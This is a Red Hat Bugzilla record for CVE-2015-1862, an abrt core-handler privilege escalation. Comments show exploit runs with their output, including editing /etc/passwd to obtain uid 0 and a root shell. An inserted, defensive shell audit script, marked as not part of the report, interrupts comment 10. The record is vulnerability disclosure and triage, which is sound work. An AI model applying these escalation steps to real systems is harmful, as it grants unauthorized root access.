Bug 1211223 - (CVE-2015-1862) CVE-2015-1862 abrt: local privilege escalation through kernel.core_pattern
Status: CLOSED NOTABUG
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: high
Severity: high
Assigned To: Red Hat Product Security
Whiteboard: impact=important,public=20150414,repo...
Keywords: Security
Depends On:
Blocks: 1211224 1214172
Reported: 2015-04-13 06:58 EDT by Vasyl Kaigorodov
Modified: 2015-07-09 01:38 EDT (History)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
A flaw was found in the way certain ABRT core handlers processed crash reports in a namespaced environment. A local, unprivileged user could use this flaw to escalate their privileges on the system.
Story Points: ---
Clone Of:
Environment:
Last Closed: 2015-07-09 01:38:34 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments: None
Description Vasyl Kaigorodov 2015-04-13 06:58:26 EDT
A local privilege escalation flaw was found in abrt, in the way certain core-handlers were specified by the abrt application. 

Specifically this issue affects those abrt versions in which the following core-handler was used:
HOOK_BIN="/usr/sbin/chroot /proc/%P/root @libexecdir@/abrt-hook-ccpp"

This was added to abrt via the following commit (to add support for handling crashes inside containers):
https://github.com/abrt/abrt/commit/4ab9fbe1a6b7889a0cd59b1406e8789d52171fd2
https://github.com/abrt/abrt/issues/809

But later removed via:
https://github.com/abrt/abrt/commit/cdb507ed336fa30151eefa6510d20c9271e7fc82

No version of Red Hat Enterprise Linux or Fedora ships abrt with the above vulnerable code.

Support for containers was re-added in abrt (using a different method this time) via:
https://github.com/abrt/abrt/commit/a6cdfd6a16251447264d203e145624a96fa811e3
Comment 2 Francisco Alonso 2015-04-14 09:48:45 EDT
Public via:

http://www.openwall.com/lists/oss-security/2015/04/14/4
Comment 3 Tavis Ormandy 2015-04-14 15:10:49 EDT
It's not obvious to me that abrt in RHEL7 is not affected, are you sure?

I installed a default RHEL 7.1 Workstation in a VM, ran the exploit and it worked.

[taviso@localhost ~]$ gcc raceabrt.c -o /tmp/raceabrt
[taviso@localhost ~]$ /tmp/raceabrt /etc/passwd
Detected ccpp-2015-04-14-20:09:32-15116.new, attempting to race...
	Didn't win, trying again!
[snip lots of output]
	Didn't win, trying again!
Detected ccpp-2015-04-14-20:09:44-15493.new, attempting to race...
	Didn't win, trying again!
Detected ccpp-2015-04-14-20:09:44-15499.new, attempting to race...
	Exploit successful...
-rw-r--r--. 1 taviso abrt 2066 Apr 14 13:02 /etc/passwd
[taviso@localhost ~]$ cat /etc/redhat-release 
Red Hat Enterprise Linux Workstation release 7.1 (Maipo)
Comment 4 Tavis Ormandy 2015-04-14 15:14:29 EDT
In case it isn't obvious, you can easily turn this into a root shell like this:
 $ getent passwd taviso
 taviso:x:1000:1000:Tavis Ormandy:/home/taviso:/bin/bash
 $ vi /etc/passwd
 $ getent passwd taviso
 taviso:x:0:0:Tavis Ormandy:/home/taviso:/bin/bash
 $ su taviso
 Password:
 # id
 uid=0(root) gid=0(root) groups=0(root)
 exit
Comment 6 Florian Weimer 2015-04-14 16:13:10 EDT
The issue raised in comment #3 and comment #4 is a different vulnerability, not CVE-2015-1862.  It is currently under investigation.
Comment 7 Huzaifa S. Sidhpurwala 2015-04-15 01:25:03 EDT
Further clarification on previous comments:

Various flaws were discovered with abrt in Red Hat Enterprise Linux and Fedora. These were initially discussed on the closed vendors list called linux-distros, before being made public.

Initially a flaw related to namespaces/chroot support in abrt was discussed and was assigned CVE-2015-1862. This bug relates to that particular CVE/flaw.

As mentioned above, since namespaces/chroot support in abrt does not exist in Red Hat Enterprise Linux and Fedora, these products are not affected by CVE-2015-1862.

Later, various other flaws were discussed on the list; these flaws were not assigned CVEs and it was suggested to discuss them via the open list, oss-security. These various other flaws are tracked via the following bug:

https://bugzilla.redhat.com/show_bug.cgi?id=1211835
http://www.openwall.com/lists/oss-security/2015/04/14/4

These additional flaws (tracked via bug 1211835) have been rated as having Important impact for Red Hat Enterprise Linux 7 as they can lead to privilege escalation to root (from a non-root local user), and Moderate impact for Red Hat Enterprise Linux 6, since they can lead to privilege escalation to root only from the abrt user.
Comment 9 Vincent Danen 2015-04-15 10:02:30 EDT
Statement:

Not vulnerable. This issue does not affect the version of abrt package as shipped with Red Hat Enterprise Linux 6 and 7. Additional information about this is available at https://bugzilla.redhat.com/show_bug.cgi?id=1211223#c7
Comment 10 Tavis Ormandy 2015-04-17 17:02:20 EDT
Thanks for the clarification, however I'm also confused about the statement "No version of Red Hat Enterprise Linux or Fedora ships abrt with the above vulnerable code", isn't Fedora 20 still supported?

$ rpm -qf /usr/libexec/abrt-hook-ccpp
abrt-addon-ccpp-2.2.2-1.fc20.x86_64
$ cat /etc/fedora-release 
Fedora release 20 (Heisenbug)
$ sysctl kernel.core_pattern
kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e

And the exploit works:

$ gcc newpid.c -o test -static
newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
 # warning this file must be compiled with -static
   ^
$ ./test 
uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),18(dialout),987(wireshark),1000(taviso) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2#
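As an added example (not part of this bug report or of the abrt project), a POSIX shell check for the chroot-based core handler named in the description and shown in the Fedora 20 `sysctl` output in comment 10. It takes the `kernel.core_pattern` string as an argument so it can be exercised offline; the `audit_live_host` helper name and the sample pattern strings are assumptions.

```shell
#!/bin/sh
# Added example, not from the abrt project or this bug report.
# Audits a kernel.core_pattern value for the vulnerable abrt core handler
# described in this bug: a pipe handler (leading "|") that runs
# "chroot /proc/%P/root ..." before abrt-hook-ccpp. %P expands to the
# crashing process's PID in the initial PID namespace, so /proc/%P/root is
# that process's root filesystem, which an unprivileged user can control,
# while the handler itself runs as root in the initial namespace.
#
# Exit codes: 0 = no pipe handler, 1 = pipe handler worth reviewing,
#             2 = chroot-based handler from this bug.

check_core_pattern() {
    pattern="$1"
    case "$pattern" in
        "|"*chroot*"/proc/%P/root"*)
            echo "VULNERABLE: handler chroots into the crashing process root: $pattern"
            return 2 ;;
        "|"*)
            echo "REVIEW: core dumps are piped to a root-run helper: $pattern"
            return 1 ;;
        *)
            echo "OK: core dumps are written to a path, no helper: $pattern"
            return 0 ;;
    esac
}

# Assumed helper: read the live value on this host (needs sysctl).
audit_live_host() {
    check_core_pattern "$(sysctl -n kernel.core_pattern)"
}

# Constructed sample inputs: the Fedora 20 value quoted in comment 10,
# the same handler without the chroot prefix, and a plain file pattern.
if [ -n "${1:-}" ]; then
    check_core_pattern "$1"
else
    for p in \
        "|/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e" \
        "|/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e" \
        "core.%p"
    do
        rc=0
        check_core_pattern "$p" || rc=$?
        echo "  -> exit status $rc"
    done
fi
```

Run it with no arguments to see the three constructed samples classified, or pass `"$(sysctl -n kernel.core_pattern)"` to check the current host.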
Comment 11 Huzaifa S. Sidhpurwala 2015-07-09 01:38:34 EDT
Please note: Fedora 20 is now EOL and will not be patched for any flaws.
Closing this flaw.
